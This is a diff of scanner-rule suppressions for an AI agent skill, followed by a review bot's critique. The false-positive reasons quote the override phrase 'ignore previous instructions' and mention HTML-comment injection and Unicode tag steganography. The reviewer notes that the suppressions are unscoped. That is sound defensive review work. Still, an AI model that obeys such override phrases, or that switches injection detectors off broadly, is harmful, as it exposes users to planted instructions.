+ reason: "FP: matched 'ignore previous instructions' as a documented example string (repeated across the Instruction Override / Hidden Content Vectors tables) in references/prompt-injection-patterns.md. See file-level note above."
+ - rule_id: ATR_2026_00111
+ reason: "FP: matched '`cat -v`' (a documented detection command for Unicode tag-character steganography) in references/prompt-injection-patterns.md. See file-level note above."
+ - rule_id: ATR_2026_00128
+ reason: "FP: matched the documented HTML-comment injection example '' in references/prompt-injection-patterns.md. See file-level note above."
+ - rule_id: ATR_2026_00213
+ reason: "FP: matched 'Ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above."
+ - rule_id: ATR_2026_00265
+ reason: "FP: matched 'ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above."
+ - rule_id: YARA_jailbreak_generic
+ reason: "FP: matched the word 'example'/'Example' inside the Jailbreak Patterns section's own worked examples in references/prompt-injection-patterns.md. See file-level note above."
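Review bot: These nine entries switch off, for the whole skill, rules that matched instruction-override strings (`ATR_2026_00095`, `ATR_2026_00213`, `ATR_2026_00265`), exfiltration-vector examples (`ATR_2026_00063`) and HTML-comment injection (`ATR_2026_00128`), while the evidence given is limited to `references/prompt-injection-patterns.md`; the entries show no path scope, so the same rules would presumably stay silent for SKILL.md and for content arriving with later digest bumps. Each reason ends with `See file-level note above.`, which points at a YAML comment that a parser drops, and the verified digest `5a64b36` appears only in that comment. Suggest making each reason self-contained, e.g. `... in references/prompt-injection-patterns.md; no hits outside references/ at getsentry/skills @5a64b36.`, after confirming that statement against the scan output. The `ATR_2026_00128` reason quotes an empty string (`''`) as the matched example, so it does not record what was matched, and the `YARA_jailbreak_generic` reason (a match on the word 'example') reads like a guess that should be checked against what the rule actually reported.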